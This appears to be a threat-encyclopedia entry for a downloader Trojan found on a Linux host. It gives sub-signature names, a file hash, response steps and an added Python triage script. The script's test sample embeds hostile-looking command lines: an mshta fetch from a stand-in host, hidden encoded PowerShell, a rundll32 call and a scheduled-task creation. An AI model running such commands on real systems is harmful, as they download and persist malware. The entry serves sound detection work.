Concrete signature match: Trojan (appears legitimate but performs malicious actions), platform Linux, family Downldr
This is a downloader Trojan detected on a Linux host. Despite the platform, the matched sub-signatures reference Windows-specific tooling (PowerShell, rundll32, mshta, regsvr32, BITS jobs, scheduled tasks, netsh helper DLLs), indicating that the file's purpose is to download and execute additional malware on Windows endpoints. The sub-signature type, PEHSTR_EXT, is a string heuristic applied to PE (Windows executable) files, which is consistent with a Windows binary being stored on the Linux machine rather than executed there. The Linux machine may therefore be acting as a staging or distribution host (for example a web root or file share) for the Windows-targeted payload; it should be treated as compromised either way.
Relevant strings associated with this threat (entries prefixed `!#HSTR:` are names of the engine's own sub-signatures rather than literal strings; the only literal string quoted is `rundll32`):
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
SHA-256 of the detected file: 652285d260515c08cfe146ebdd2f5a4977ec490a608c57007abcb5b6f4fd4975
Recommended response:
1. Isolate the affected Linux host from the network.
2. Ensure the detected file is quarantined (retain a copy for analysis) or deleted, and check whether other copies exist in the same web root or share.
3. Investigate how the file arrived on the Linux host and find the initial point of compromise (e.g., a vulnerable or misconfigured web service or upload path).
4. Scan Windows endpoints for signs of compromise: search for the file hash above, for unusual executions of PowerShell, rundll32, mshta and regsvr32, and for newly created scheduled tasks or BITS jobs.
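The following script is an added example, not part of the original page or of any vendor's detection engine. It shows how to triage a suspect file on the Linux host in the way the description above implies: verify its SHA-256 against the indicator quoted on this page, and then replicate the idea behind the PEHSTR_EXT string heuristics by searching the file for references to the Windows tools named in the sub-signature list (mshta, rundll32, regsvr32, PowerShell, BITS, scheduled tasks, netsh helper DLLs). The regular expressions are my own assumption of what such sub-signatures look for, not the vendor's actual patterns, and the sample buffer is constructed for the demonstration. Strings in Windows PE files are often stored as UTF-16LE, so the scan checks both ASCII and wide encodings at both byte alignments; a plain `strings`-style ASCII search would miss half of the constructed sample.

```python
from __future__ import annotations

import hashlib
import re
import sys

# SHA-256 indicator quoted on this page for the detected file.
IOC_SHA256 = "652285d260515c08cfe146ebdd2f5a4977ec490a608c57007abcb5b6f4fd4975"

# Assumed patterns for the Windows tooling referenced by the sub-signature list.
# These are illustrative, not the engine's real PEHSTR_EXT patterns.
PATTERNS = {
    "mshta": r"mshta(?:\.exe)?",
    "rundll32": r"rundll32(?:\.exe)?",
    "regsvr32": r"regsvr32(?:\.exe)?",
    "powershell": r"powershell(?:\.exe)?",
    "bitsadmin": r"bitsadmin(?:\.exe)?",
    "schtasks": r"schtasks(?:\.exe)?",
    "netsh_helper_dll": r"netsh\s+add\s+helper",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_ioc(data: bytes) -> bool:
    """True if the buffer is the exact file this page's indicator refers to."""
    return sha256_hex(data) == IOC_SHA256


def _wide_views(data: bytes):
    """Decode the buffer as UTF-16LE at both byte alignments.

    A wide string can start at an odd offset, in which case decoding from
    offset 0 yields garbage; decoding from offset 1 recovers it.
    """
    for off in (0, 1):
        chunk = data[off:]
        if len(chunk) % 2:
            chunk = chunk[:-1]
        yield chunk.decode("utf-16-le", "replace")


def find_lolbin_strings(data: bytes) -> dict[str, set[str]]:
    """Return {pattern_name: {"<encoding>:<matched text>", ...}} for every hit."""
    # latin-1 is a lossless byte-to-char view, so ASCII regexes apply directly.
    views = [("ascii", data.decode("latin-1"))]
    views += [("utf16le", text) for text in _wide_views(data)]
    hits: dict[str, set[str]] = {}
    for name, pat in PATTERNS.items():
        rx = re.compile(pat, re.IGNORECASE)
        for enc, text in views:
            for m in rx.finditer(text):
                hits.setdefault(name, set()).add(f"{enc}:{m.group(0).lower()}")
    return hits


def triage(data: bytes, min_families: int = 3) -> dict:
    """Flag the buffer if it is the known IOC or references several Windows LOLBins."""
    hits = find_lolbin_strings(data)
    known = matches_ioc(data)
    return {
        "sha256": sha256_hex(data),
        "known_ioc": known,
        "families": sorted(hits),
        "suspicious": known or len(hits) >= min_families,
    }


# Constructed sample: a fake PE-like blob mixing ASCII and UTF-16LE tool references.
# The mshta string lands at an odd offset and the PowerShell string at an even one,
# so both alignments of the wide-string scan are exercised.
SAMPLE = (
    b"MZ" + b"\x00" * 30
    + b"rundll32.exe shell32.dll,Control_RunDLL evil.cpl\x00"
    + "mshta.exe http://example.invalid/p.hta".encode("utf-16-le") + b"\x00\x00"
    + b"\x01"
    + "powershell -nop -w hidden -enc AAAA".encode("utf-16-le")
    + b"\x00schtasks /create /sc minute /tn upd\x00"
)


if __name__ == "__main__":
    # Usage on the Linux host: python3 triage.py /path/to/quarantined/file
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    result = triage(data)
    print(f"sha256:    {result['sha256']}  (known IOC: {result['known_ioc']})")
    for name, found in sorted(find_lolbin_strings(data).items()):
        print(f"{name:17s} {sorted(found)}")
    print("verdict:   " + ("SUSPICIOUS" if result["suspicious"] else "no hits"))
```

Run it against the quarantined file on the Linux host; with no argument it scans the constructed sample and reports four tool families (mshta, powershell, rundll32, schtasks), two of which are only visible through the UTF-16LE views. Hash equality is the only check that identifies this specific file; the string scan is a heuristic for related or repacked payloads and will raise hits on legitimate Windows administration tools too, so treat its output as a triage lead, not a verdict.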